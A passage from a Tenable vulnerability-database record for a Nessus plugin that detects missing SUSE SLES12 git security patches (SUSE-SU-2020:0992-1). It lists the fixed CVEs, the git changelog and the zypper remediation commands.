advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-15T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : git (SUSE-SU-2020:0992-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-4900", "CVE-2017-1000117", "CVE-2017-14867", "CVE-2017-15298", "CVE-2017-8386", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-19486", "CVE-2019-1348", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1351", "CVE-2019-1352", "CVE-2019-1353", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-19604", "CVE-2020-5260"], "modified": "2022-05-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "p-cpe:/a:novell:suse_linux:libpcre2-16", "p-cpe:/a:novell:suse_linux:libpcre2-16-0-debuginfo", "p-cpe:/a:novell:suse_linux:libpcre2-32", "p-cpe:/a:novell:suse_linux:libpcre2-32-0-debuginfo", "p-cpe:/a:novell:suse_linux:libpcre2-8", "p-cpe:/a:novell:suse_linux:libpcre2-8-0-debuginfo", "p-cpe:/a:novell:suse_linux:libpcre2-posix2", "p-cpe:/a:novell:suse_linux:libpcre2-posix2-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-0992-1.NASL", "href": "https://www.tenable.com/plugins/nessus/135580", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:0992-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135580);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2005-4900\",\n \"CVE-2017-8386\",\n \"CVE-2017-14867\",\n \"CVE-2017-15298\",\n \"CVE-2017-1000117\",\n \"CVE-2018-11233\",\n \"CVE-2018-11235\",\n \"CVE-2018-17456\",\n \"CVE-2018-19486\",\n \"CVE-2019-1348\",\n \"CVE-2019-1349\",\n \"CVE-2019-1350\",\n \"CVE-2019-1351\",\n \"CVE-2019-1352\",\n \"CVE-2019-1353\",\n \"CVE-2019-1354\",\n \"CVE-2019-1387\",\n \"CVE-2019-19604\",\n \"CVE-2020-5260\"\n );\n\n script_name(english:\"SUSE SLES12 Security Update : git (SUSE-SU-2020:0992-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for git fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2020-5260: With a crafted URL that contains a newline in it, the\ncredential helper machinery can be fooled to give credential\ninformation for a wrong host (bsc#1168930).\n\nNon-security issue fixed :\n\ngit was updated to 2.26.0 for SHA256 support (bsc#1167890,\njsc#SLE-11608): the xinetd snippet was removed\n\nthe System V init script for the git-daemon was replaced by a systemd\nservice file of the same name.\n\ngit 2.26.0: 'git rebase' now uses a different backend that is based on\nthe 'merge' machinery by default. The 'rebase.backend' configuration\nvariable reverts to old behaviour when set to 'apply'\n\nImproved handling of sparse checkouts\n\nImprovements to many commands and internal features\n\ngit 2.25.1: 'git commit' now honors advise.statusHints\n\nvarious updates, bug fixes and documentation updates\n\ngit 2.25.0: The branch description ('git branch --edit-description')\nhas been used to fill the body of the cover letters by the\nformat-patch command; this has been enhanced so that the subject can\nalso be filled.\n\nA few commands learned to take the pathspec from the standard input or\na named file, instead of taking it as the command line arguments, with\nthe '--pathspec-from-file' option.\n\nTest updates to prepare for SHA-2 transition continues.\n\nRedo 'git name-rev' to avoid recursive calls.\n\nWhen all files from some subdirectory were renamed to the root\ndirectory, the directory rename heuristics would fail to detect that\nas a rename/merge of the subdirectory to the root directory, which has\nbeen corrected.\n\nHTTP transport had possible allocator/deallocator mismatch, which has\nbeen corrected.\n\ngit 2.24.1: CVE-2019-1348: The --export-marks option of fast-import is\nexposed also via the in-stream command feature export-marks=... and it\nallows overwriting arbitrary paths (bsc#1158785)\n\nCVE-2019-1349: on Windows, when submodules are cloned recursively,\nunder certain circumstances Git could be fooled into using the same\nGit directory twice (bsc#1158787)\n\nCVE-2019-1350: Incorrect quoting of command-line arguments allowed\nremote code execution during a recursive clone in conjunction with SSH\nURLs (bsc#1158788)\n\nCVE-2019-1351: on Windows mistakes drive letters outside of the\nUS-English alphabet as relative paths (bsc#1158789)\n\nCVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams\n(bsc#1158790)\n\nCVE-2019-1353: when run in the Windows Subsystem for Linux while\naccessing a working directory on a regular Windows drive, none of the\nNTFS protections were active (bsc#1158791)\n\nCVE-2019-1354: on Windows refuses to write tracked files with\nfilenames that contain backslashes (bsc#1158792)\n\nCVE-2019-1387: Recursive clones vulnerability that is caused by\ntoo-lax validation of submodule names, allowing very targeted attacks\nvia remote code execution in recursive clones (bsc#1158793)\n\nCVE-2019-19604: a recursive clone followed by a submodule update could\nexecute code contained within the repository without the user\nexplicitly having asked for that (bsc#1158795)\n\nFix building with asciidoctor and without DocBook4 stylesheets.\n\ngit 2.24.0 The command line parser learned '--end-of-options'\nnotation.\n\nA mechanism to affect the default setting for a (related) group of\nconfiguration variables is introduced.\n\n'git fetch' learned '--set-upstream' option to help those who first\nclone from their private fork they intend to push to, add the true\nupstream via 'git remote add' and then 'git fetch' from it.\n\nfixes and improvements to UI, workflow and features, bash completion\nfixes\n\npart of it merged upstream\n\nthe Makefile attempted to download some documentation, banned\n\ngit 2.23.0: The '--base' option of 'format-patch' computed the\npatch-ids for prerequisite patches in an unstable way, which has been\nupdated to compute in a way that is compatible with 'git patch-id\n\n--stable'.\n\nThe 'git log' command by default behaves as if the --mailmap option\nwas given.\n\nfixes and improvements to UI, workflow and features\n\ngit 2.22.1: A relative pathname given to 'git init\n--template=<path><repo>' ought to be relative to the directory 'git\ninit' gets invoked in, but it instead was made relative to the\nrepository, which has been corrected. </repo></path>\n\n'git worktree add' used to fail when another worktree connected to the\nsame repository was corrupt, which has been corrected.\n\n'git am -i --resolved' segfaulted after trying to see a commit as if\nit were a tree, which has been corrected.\n\n'git merge --squash' is designed to update the working tree and the\nindex without creating the commit, and this cannot be countermanded by\nadding the '--commit' option; the command now refuses to work when\nboth options are given.\n\nUpdate to Unicode 12.1 width table.\n\n'git request-pull' learned to warn when the ref we ask them to pull\nfrom in the local repository and in the published repository are\ndifferent.\n\n'git fetch' into a lazy clone forgot to fetch base objects that are\nnecessary to complete delta in a thin packfile, which has been\ncorrected.\n\nThe URL decoding code has been updated to avoid going past the end of\nthe string while parsing %-<hex>-<hex> sequence. </hex></hex>\n\n'git clean' silently skipped a path when it cannot lstat() it; now it\ngives a warning.\n\n'git rm' to resolve a conflicted path leaked an internal message\n'needs merge' before actually removing the path, which was confusing.\nThis has been corrected.\n\nMany more bugfixes and code cleanups.\n\nremoval of SuSEfirewall2 service, since SuSEfirewall2 has been\nreplaced by firewalld, see [1]. [1]:\nhttps://lists.opensuse.org/opensuse-factory/2019-01/msg00490.html\n\ngit 2.22.0: The filter specification '--filter=sparse:path=<path>'\nused to create a lazy/partial clone has been removed. Using a blob\nthat is part of the project as sparse specification is still supported\nwith the '--filter=sparse:oid=<blob>' option </blob></path>\n\n'git checkout --no-overlay' can be used to trigger a new mode of\nchecking out paths out of the tree-ish, that allows paths that match\nthe pathspec that are in the current index and working tree and are\nnot in the tree-ish.\n\nFour new configuration variables {author,committer}.{name,email} have\nbeen introduced to override user.{name,email} in more specific cases.\n\n'git branch' learned a new subcommand '--show-current'.\n\nThe command line completion (in contrib/) has been taught to complete\nmore subcommand parameters.\n\nThe completion helper code now pays attention to repository-local\nconfiguration (when available), which allows --list-cmds to honour a\nrepository specific setting of completion.commands, for example.\n\nThe list of conflicted paths shown in the editor while concluding a\nconflicted merge was shown above the scissors line when the clean-up\nmode is set to 'scissors', even though it was commented out just like\nthe list of updated paths and other information to help the user\nexplain the merge better.\n\n'git rebase' that was reimplemented in C did not set ORIG_HEAD\ncorrectly, which has been corrected.\n\n'git worktree add' used to do a 'find an available name with stat and\nthen mkdir', which is race-prone. This has been fixed by using mkdir\nand reacting to EEXIST in a loop.\n\nupdate git-web AppArmor profile for bash and tar usrMerge\n(bsc#1132350)\n\ngit 2.21.0: Historically, the '-m' (mainline) option can only be used\nfor 'git cherry-pick' and 'git revert' when working with a merge\ncommit. This version of Git no longer warns or errors out when working\nwith a single-parent commit, as long as the argument to the '-m'\noption is 1 (i.e. it has only one parent, and the request is to pick\nor revert relative to that first parent). Scripts that relied on the\nbehaviour may get broken with this change.\n\nSmall fixes and features for fast-export and fast-import.\n\nThe 'http.version' configuration variable can be used with recent\nenough versions of cURL library to force the version of HTTP used to\ntalk when fetching and pushing.\n\n'git push $there $src:$dst' rejects when $dst is not a fully qualified\nrefname and it is not clear what the end user meant.\n\nUpdate 'git multimail' from the upstream.\n\nA new date format '--date=human' that morphs its output depending on\nhow far the time is from the current time has been introduced.\n'--date=auto:human' can be used to use this new format (or any\nexisting format) when the output is going to the pager or to the\nterminal, and otherwise the default format.\n\nFix worktree creation race (bsc#1114225).\n\ngit 2.20.1: portability fixes\n\n'git help -a' did not work well when an overly long alias was defined\n\nno longer squelched an error message when the run_command API failed\nto run a missing command\n\ngit 2.20.0: 'git help -a' now gives verbose output (same as 'git help\n-av'). Those who want the old output may say 'git help --no-verbose\n-a'..\n\n'git send-email' learned to grab address-looking string on any trailer\nwhose name ends with '-by'.\n\n'git format-patch' learned new '--interdiff' and '--range-diff'\noptions to explain the difference between this version and the\nprevious attempt in the cover letter (or after the three-dashes as a\ncomment).\n\nDeveloper builds now use -Wunused-function compilation option.\n\nFix a bug in which the same path could be registered under multiple\nworktree entries if the path was missing (for instance, was removed\nmanually). Also, as a convenience, expand the number of cases in which\n\n--force is applicable.\n\nThe overly large Documentation/config.txt file have been split into\nmillion little pieces. This potentially allows each individual piece\nto be included into the manual page of the command it affects more\neasily.\n\nMalformed or crafted data in packstream can make our code attempt to\nread or write past the allocated buffer and abort, instead of\nreporting an error, which has been fixed.\n\nFix for a long-standing bug that leaves the index file corrupt when it\nshrinks during a partial commit.\n\n'git merge' and 'git pull' that merges into an unborn branch used to\ncompletely ignore '--verify-signatures', which has been corrected.\n\n...and much more features and fixes\n\nfix CVE-2018-19486 (bsc#1117257)\n\ngit 2.19.2: various bug fixes for multiple subcommands and operations\n\ngit 2.19.1: CVE-2018-17456: Specially crafted .gitmodules files may\nhave allowed arbitrary code execution when the repository is cloned\nwith\n\n--recurse-submodules (bsc#1110949)\n\ngit 2.19.0: 'git diff' compares the index and the working tree. For\npaths added with intent-to-add bit, the command shows the full\ncontents of them as added, but the paths themselves were not marked as\nnew files. They are now shown as new by default.\n\n'git apply' learned the '--intent-to-add' option so that an otherwise\nworking-tree-only application of a patch will add new paths to the\nindex marked with the 'intent-to-add' bit.\n\n'git grep' learned the '--column' option that gives not just the line\nnumber but the column number of the hit.\n\nThe '-l' option in 'git branch -l' is an unfortunate short-hand for\n'--create-reflog', but many users, both old and new, somehow expect it\nto be something else, perhaps '--list'. This step warns when '-l' is\nused as a short-hand for '--create-reflog' and warns about the future\nrepurposing of the it when it is used.\n\nThe userdiff pattern for .php has been updated.\n\nThe content-transfer-encoding of the message 'git send-email' sends\nout by default was 8bit, which can cause trouble when there is an\noverlong line to bust RFC 5322/2822 limit. A new option 'auto' to\nautomatically switch to quoted-printable when there is such a line in\nthe payload has been introduced and is made the default.\n\n'git checkout' and 'git worktree add' learned to honor\ncheckout.defaultRemote when auto-vivifying a local branch out of a\nremote tracking branch in a repository with multiple remotes that have\ntracking branches that share the same names. (merge 8d7b558bae\nab/checkout-default-remote later to maint).\n\n'git grep' learned the '--only-matching' option.\n\n'git rebase --rebase-merges' mode now handles octopus merges as well.\n\nAdd a server-side knob to skip commits in exponential/fibbonacci\nstride in an attempt to cover wider swath of history with a smaller\nnumber of iterations, potentially accepting a larger packfile\ntransfer, instead of going back one commit a time during common\nancestor discovery during the 'git fetch' transaction. (merge\n42cc7485a2 jt/fetch-negotiator-skipping later to maint).\n\nA new configuration variable core.usereplacerefs has been added,\nprimarily to help server installations that want to ignore the replace\nmechanism altogether.\n\nTeach 'git tag -s' etc. a few configuration variables (gpg.format that\ncan be set to 'openpgp' or 'x509', and gpg.<format>.program that is\nused to specify what program to use to deal with the format) to allow\nx.509 certs with CMS via 'gpgsm' to be used instead of openpgp via\n'gnupg'. </format>\n\nMany more strings are prepared for l10n.\n\n'git p4 submit' learns to ask its own pre-submit hook if it should\ncontinue with submitting.\n\nThe test performed at the receiving end of 'git push' to prevent bad\nobjects from entering repository can be customized via receive.fsck.*\nconfiguration variables; we now have gained a counterpart to do the\nsame on the 'git fetch' side, with fetch.fsck.* configuration\nvariables.\n\n'git pull --rebase=interactive' learned 'i' as a short-hand for\n'interactive'.\n\n'git instaweb' has been adjusted to run better with newer Apache on\nRedHat based distros.\n\n'git range-diff' is a reimplementation of 'git tbdiff' that lets us\ncompare individual patches in two iterations of a topic.\n\nThe sideband code learned to optionally paint selected keywords at the\nbeginning of incoming lines on the receiving end.\n\n'git branch --list' learned to take the default sort order from the\n'branch.sort' configuration variable, just like 'git tag --list' pays\nattention to 'tag.sort'.\n\n'git worktree' command learned '--quiet' option to make it less\nverbose.\n\ngit 2.18.0: improvements to rename detection logic\n\nWhen built with more recent cURL, GIT_SSL_VERSION can now specify\n'tlsv1.3' as its value.\n\n'git mergetools' learned talking to guiffy.\n\nvarious other workflow improvements and fixes\n\nperformance improvements and other developer visible fixes\n\nUpdate to git 2.16.4: security fix release\n\ngit 2.17.1: Submodule 'names' come from the untrusted .gitmodules\nfile, but we blindly append them to $GIT_DIR/modules to create our\non-disk repo paths. This means you can do bad things by putting '../'\ninto the name. We now enforce some rules for submodule names which\nwill cause Git to ignore these malicious names (CVE-2018-11235,\nbsc#1095219)\n\nIt was possible to trick the code that sanity-checks paths on NTFS\ninto reading random piece of memory (CVE-2018-11233, bsc#1095218)\n\nSupport on the server side to reject pushes to repositories that\nattempt to create such problematic .gitmodules file etc. as tracked\ncontents, to help hosting sites protect their customers by preventing\nmalicious contents from spreading.\n\ngit 2.17.0: 'diff' family of commands learned\n'--find-object=<object-id>' option to limit the findings to changes\nthat involve the named object. </object-id>\n\n'git format-patch' learned to give 72-cols to diffstat, which is\nconsistent with other line length limits the subcommand uses for its\noutput meant for e-mails.\n\nThe log from 'git daemon' can be redirected with a new option; one\nrelevant use case is to send the log to standard error (instead of\nsyslog) when running it from inetd.\n\n'git rebase' learned to take '--allow-empty-message' option.\n\n'git am' has learned the '--quit' option, in addition to the existing\n'--abort' option; having the pair mirrors a few other commands like\n'rebase' and 'cherry-pick'.\n\n'git worktree add' learned to run the post-checkout hook, just like\n'git clone' runs it upon the initial checkout.\n\n'git tag' learned an explicit '--edit' option that allows the message\ngiven via '-m' and '-F' to be further edited.\n\n'git fetch --prune-tags' may be used as a handy short-hand for getting\nrid of stale tags that are locally held.\n\nThe new '--show-current-patch' option gives an end-user facing way to\nget the diff being applied when 'git rebase' (and 'git am') stops with\na conflict.\n\n'git add -p' used to offer '/' (look for a matching hunk) as a choice,\neven there was only one hunk, which has been corrected. Also the\nsingle-key help is now given only for keys that are enabled (e.g. help\nfor '/' won't be shown when there is only one hunk).\n\nSince Git 1.7.9, 'git merge' defaulted to --no-ff (i.e. even when the\nside branch being merged is a descendant of the current commit, create\na merge commit instead of fast-forwarding) when merging a tag object.\nThis was appropriate default for integrators who pull signed tags from\ntheir downstream contributors, but caused an unnecessary merges when\nused by downstream contributors who habitually 'catch up' their topic\nbranches with tagged releases from the upstream. Update 'git merge' to\ndefault to --no-ff only when merging a tag object that does *not* sit\nat its usual place in refs/tags/ hierarchy, and allow fast-forwarding\notherwise, to mitigate the problem.\n\n'git status' can spend a lot of cycles to compute the relation between\nthe current branch and its upstream, which can now be disabled with\n'--no-ahead-behind' option.\n\n'git diff' and friends learned funcname patterns for Go language\nsource files.\n\n'git send-email' learned '--reply-to=<address>' option. </address>\n\nFuncname pattern used for C# now recognizes 'async' keyword.\n\nIn a way similar to how 'git tag' learned to honor the pager setting\nonly in the list mode, 'git config' learned to ignore the pager\nsetting when it is used for setting values (i.e. when the purpose of\nthe operation is not to 'show').\n\nUse %license instead of %doc [bsc#1082318]\n\ngit 2.16.3: 'git status' after moving a path in the working tree\n(hence making it appear 'removed') and then adding with the -N option\n(hence making that appear 'added') detected it as a rename, but did\nnot report the old and new pathnames correctly.\n\n'git commit --fixup' did not allow '-m<message>' option to be used at\nthe same time; allow it to annotate resulting commit with more text.\n</message>\n\nWhen resetting the working tree files recursively, the working tree of\nsubmodules are now also reset to match.\n\nFix for a commented-out code to adjust it to a rather old API change\naround object ID.\n\nWhen there are too many changed paths, 'git diff' showed a warning\nmessage but in the middle of a line.\n\nThe http tracing code, often used to debug connection issues, learned\nto redact potentially sensitive information from its output so that it\ncan be more safely sharable.\n\nCrash fix for a corner case where an error codepath tried to unlock\nwhat it did not acquire lock on.\n\nThe split-index mode had a few corner case bugs fixed.\n\nAssorted fixes to 'git daemon'.\n\nCompletion of 'git merge -s<strategy>' (in contrib/) did not work well\nin non-C locale. </strategy>\n\nWorkaround for segfault with more recent versions of SVN.\n\nRecently introduced leaks in fsck have been plugged.\n\nTravis CI integration now builds the executable in 'script' phase to\nfollow the established practice, rather than during 'before_script'\nphase. This allows the CI categorize the failures better ('failed' is\nproject's fault, 'errored' is build environment's).\n\nDrop superfluous xinetd snippet, no longer used (bsc#1084460)\n\nBuild with asciidoctor for the recent distros (bsc#1075764)\n\nMove %{?systemd_requires} to daemon subpackage\n\nCreate subpackage for libsecret credential helper.\n\ngit 2.16.2: An old regression in 'git describe --all $annotated_tag^0'\nhas been fixed.\n\n'git svn dcommit' did not take into account the fact that a svn+ssh://\nURL with a username@ (typically used for pushing) refers to the same\nSVN repository without the username@ and failed when svn.pushmergeinfo\noption is set.\n\n'git merge -Xours/-Xtheirs' learned to use our/their version when\nresolving a conflicting updates to a symbolic link.\n\n'git clone $there $here' is allowed even when here directory exists as\nlong as it is an empty directory, but the command incorrectly removed\nit upon a failure of the operation.\n\n'git stash -- <pathspec>' incorrectly blew away untracked files in the\ndirectory that matched the pathspec, which has been corrected.\n</pathspec>\n\n'git add -p' was taught to ignore local changes to submodules as they\ndo not interfere with the partial addition of regular changes anyway.\n\ngit 2.16.1: 'git clone' segfaulted when cloning a project that happens\nto track two paths that differ only in case on a case insensitive\nfilesystem\n\ngit 2.16.0 (CVE-2017-15298, bsc#1063412): See\nhttps://raw.github.com/git/git/master/Documentation/RelNotes/2.16.0.tx\nt\n\ngit 2.15.1: fix 'auto' column output\n\nfixes to moved lines diffing\n\ndocumentation updates\n\nfix use of repositories immediately under the root directory\n\nimprove usage of libsecret\n\nfixes to various error conditions in git commands\n\nRewrite from sysv init to systemd unit file for git-daemon\n(bsc#1069803)\n\nReplace references to /var/adm/fillup-templates with new %_fillupdir\nmacro (bsc#1069468)\n\nsplit off p4 to a subpackage (bsc#1067502)\n\nBuild with the external libsha1detectcoll (bsc#1042644)\n\ngit 2.15.0: Use of an empty string as a pathspec element that is used\nfor 'everything matches' is still warned and Git asks users to use a\nmore explicit '.' for that instead. Removal scheduled for 2.16\n\nGit now avoids blindly falling back to '.git' when the setup sequence\nsaid we are _not_ in Git repository (another corner case removed)\n\n'branch --set-upstream' was retired, deprecated since 1.8\n\nmany other improvements and updates\n\ngit 2.14.3: git send-email understands more cc: formats\n\nfixes so gitk --bisect\n\ngit commit-tree fixed to handle -F file alike\n\nPrevent segfault in 'git cat-file --textconv'\n\nFix function header parsing for HTML\n\nVarious small fixes to user commands and and internal functions\n\ngit 2.14.2: fixes to color output\n\nhttp.{sslkey,sslCert} now interpret '~[username]/' prefix\n\nfixes to walking of reflogs via 'log -g' and friends\n\nvarious fixes to output correctness\n\n'git push --recurse-submodules $there HEAD:$target' is now propagated\ndown to the submodules\n\n'git clone --recurse-submodules --quiet' c$how propagates quiet option\ndown to submodules.\n\n'git svn --localtime' correctness fixes\n\n'git grep -L' and 'git grep --quiet -L' now report same exit code\n\nfixes to 'git apply' when converting line endings\n\nVarious Perl scripts did not use safe_pipe_capture() instead of\nbackticks, leaving them susceptible to end-user input. CVE-2017-14867\nbsc#1061041\n\n'git cvsserver' no longer is invoked by 'git daemon' by default\n\ngit 2.14.1 (bsc#1052481): Security fix for CVE-2017-1000117: A\nmalicious third-party can give a crafted 'ssh://...' URL to an\nunsuspecting victim, and an attempt to visit the URL can result in any\nprogram that exists on the victim's machine being executed. Such a URL\ncould be placed in the .gitmodules file of a malicious project, and an\nunsuspecting victim could be tricked into running 'git clone\n--recurse-submodules' to trigger the vulnerability.\n\nA 'ssh://...' URL can result in a 'ssh' command line with a hostname\nthat begins with a dash '-', which would cause the 'ssh' command to\ninstead (mis)treat it as an option. This is now prevented by\nforbidding such a hostname (which should not impact any real-world\nusage).\n\nSimilarly, when GIT_PROXY_COMMAND is configured, the command is run\nwith host and port that are parsed out from 'ssh://...' URL; a poorly\nwritten GIT_PROXY_COMMAND could be tricked into treating a string that\nbegins with a dash '-' as an option. This is now prevented by\nforbidding such a hostname and port number (again, which should not\nimpact any real-world usage).\n\nIn the same spirit, a repository name that begins with a dash '-' is\nalso forbidden now.\n\ngit 2.14.0: Use of an empty string as a pathspec element that is used\nfor 'everything matches' is deprecated, use '.'\n\nAvoid blindly falling back to '.git' when the setup sequence indicates\noperation not on a Git repository\n\n'indent heuristics' are now the default.\n\nBuilds with pcre2\n\nMany bug fixes, improvements and updates\n\ngit 2.13.4: Update the character width tables.\n\nFix an alias that contained an uppercase letter\n\nProgress meter fixes\n\ngit gc concurrency fixes\n\ngit 2.13.3: various internal bug fixes\n\nFix a regression to 'git rebase -i'\n\nCorrect unaligned 32-bit access in pack-bitmap code\n\nTighten error checks for invalid 'git apply' input\n\nThe split index code did not honor core.sharedrepository setting\ncorrectly\n\nFix 'git branch --list' handling of color.branch.local\n\ngit 2.13.2: 'collision detecting' SHA-1 update for platform fixes\n\n'git checkout --recurse-submodules' did not quite work with a\nsubmodule that itself has submodules.\n\nThe 'run-command' API implementation has been made more robust against\ndead-locking in a threaded environment.\n\n'git clean -d' now only cleans ignored files with '-x'\n\n'git status --ignored' did not list ignored and untracked files\nwithout '-uall'\n\n'git pull --rebase --autostash' didn't auto-stash when the local\nhistory fast-forwards to the upstream.\n\n'git describe --contains' gives as much weight to lightweight tags as\nannotated tags\n\nFix 'git stash push <pathspec>' from a subdirectory </pathspec>\n\ngit 2.13.1: Setting 'log.decorate=false' in the configuration file did\nnot take effect in v2.13, which has been corrected.\n\ncorrections to documentation and command help output\n\ngarbage collection fixes\n\nmemory leaks fixed\n\nreceive-pack now makes sure that the push certificate records the same\nset of push options used for pushing\n\nshell completion corrections for git stash\n\nfix 'git clone --config var=val' with empty strings\n\ninternal efficiency improvements\n\nUpdate sha1 collision detection code for big-endian platforms and\nplatforms not supporting unaligned fetches\n\nFix packaging of documentation\n\ngit 2.13.0: empty string as a pathspec element for 'everything\nmatches' is still warned, for future removal.\n\ndeprecated argument order 'git merge <msg> HEAD <commit>...' was\nremoved </commit></msg>\n\ndefault location '~/.git-credential-cache/socket' for the socket used\nto communicate with the credential-cache daemon moved to\n'~/.cache/git/credential/socket'.\n\nnow avoid blindly falling back to '.git' when the setup sequence\nindicated otherwise\n\nmany workflow features, improvements and bug fixes\n\nadd a hardened implementation of SHA1 in response to practical\ncollision attacks (CVE-2005-4900, bsc#1042640)\n\nCVE-2017-8386: On a server running git-shell as login shell to\nrestrict user to git commands, remote users may have been able to have\ngit service programs spawn an interactive pager and thus escape the\nshell restrictions. (bsc#1038395)\n\nChanges in pcre2: Include the libraries, development and tools\npackages.\n\ngit uses only libpcre2-8 so far, but this allows further application\nusage of pcre2.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1167890\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1168930\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-factory/2019-01/msg00490.html\");\n # https://raw.github.com/git/git/master/Documentation/RelNotes/2.16.0.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9a796f1e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-5260/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20200992-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d199ff91\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 8:zypper in -t patch\nSUSE-OpenStack-Cloud-Crowbar-8-2020-992=1\n\nSUSE OpenStack Cloud 8:zypper in -t patch\nSUSE-OpenStack-Cloud-8-2020-992=1\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2020-992=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5:zypper in -t\npatch SUSE-SLE-SDK-12-SP5-2020-992=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP4:zypper in -t\npatch SUSE-SLE-SDK-12-SP4-2020-992=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3:zypper in -t patch\nSUSE-SLE-SAP-12-SP3-2020-992=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2020-992=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP5:zypper in -t patch\nSUSE-SLE-SERVER-12-SP5-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-BCL-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2020-992=1\n\nSUSE Enterprise Storage 5:zypper in -t patch SUSE-Storage-5-2020-992=1\n\nHPE Helion Openstack 8:zypper in -t patch\nHPE-Helion-OpenStack-8-2020-992=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19604\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-1353\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-16-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-32-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-8-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-posix2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-posix2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 